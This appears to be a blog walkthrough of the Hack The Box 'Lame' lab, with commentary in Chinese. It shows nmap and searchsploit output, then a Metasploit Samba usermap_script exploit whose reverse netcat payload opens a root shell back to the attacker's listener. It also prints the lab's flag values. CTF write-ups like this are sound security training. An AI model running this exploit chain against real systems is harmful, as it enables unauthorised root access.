Hackthebox Lame

Hackthebox Lame

NMAP Scanning

──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ sudo nmap -sS -sV -sC -p- 10.129.145.147 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 10:06 EDT
Nmap scan report for localhost (10.129.145.147)
Host is up (0.25s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.62
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  �m V      Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-07-11T10:21:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h09m07s, deviation: 2h49m46s, median: 9m04s
|_smb2-time: Protocol negotiation failed (SMB2)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ searchsploit vsftpd 2.3.4                                  
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                                  | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                     | unix/remote/17491.rb

虽然metasploit模块,但是却执行失败。

其实在NMAP扫描结果可知samba的版本:

┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ searchsploit samba 3.0.20            
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                     | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                           | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                      | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                              | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

在Metasploit中也有samba的漏洞利用模块:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options 

Module options (exploit/multi/samba/usermap_script):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.62
LHOST => 10.10.14.62
msf6 exploit(multi/samba/usermap_script) > set LPORT  5555
LPORT => 5555
msf6 exploit(multi/samba/usermap_script) > set RHOSTS  10.129.145.147
RHOSTS => 10.129.145.147
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.62:5555 
[*] Command shell session 1 opened (10.10.14.62:5555 -> 10.129.145.147:49206) at 2023-07-11 10:36:57 -0400

id   
uid=0(root) gid=0(root)


root@lame:/root# cat root.txt
09a885cf7c8bfbd4d21cbffe69eef798
root@lame:/home# cd makis
root@lame:/home/makis# ls -alh
total 28K
drwxr-xr-x 2 makis makis 4.0K Mar 14  2017 .
drwxr-xr-x 6 root  root  4.0K Mar 14  2017 ..
-rw------- 1 makis makis 1.1K Mar 14  2017 .bash_history
-rw-r--r-- 1 makis makis  220 Mar 14  2017 .bash_logout
-rw-r--r-- 1 makis makis 2.9K Mar 14  2017 .bashrc
-rw-r--r-- 1 makis makis  586 Mar 14  2017 .profile
-rw-r--r-- 1 makis makis    0 Mar 14  2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis   33 Jul 11 10:08 user.txt
root@lame:/home/makis# cat user.txt
bf43559a3fed24e30fe5cbfdafef3c67

经验教训

  1. 对于Samba服务,不能想当然的就以为通过smbclient命令获得共享目录,或者enum4linux获取可能的用户名,而是要注意其版本号,看是否存在相关的漏洞

  2. 对vsftpd 2.3.4漏洞,一看到是该版本,就错误的认为突破点应该就在该服务上,但是本靶机的结果表明这样先入为主的想法是完全错误的。

posted @ 2023-07-11 22:54  Jason_huawen  阅读(29)  评论(0编辑  收藏  举报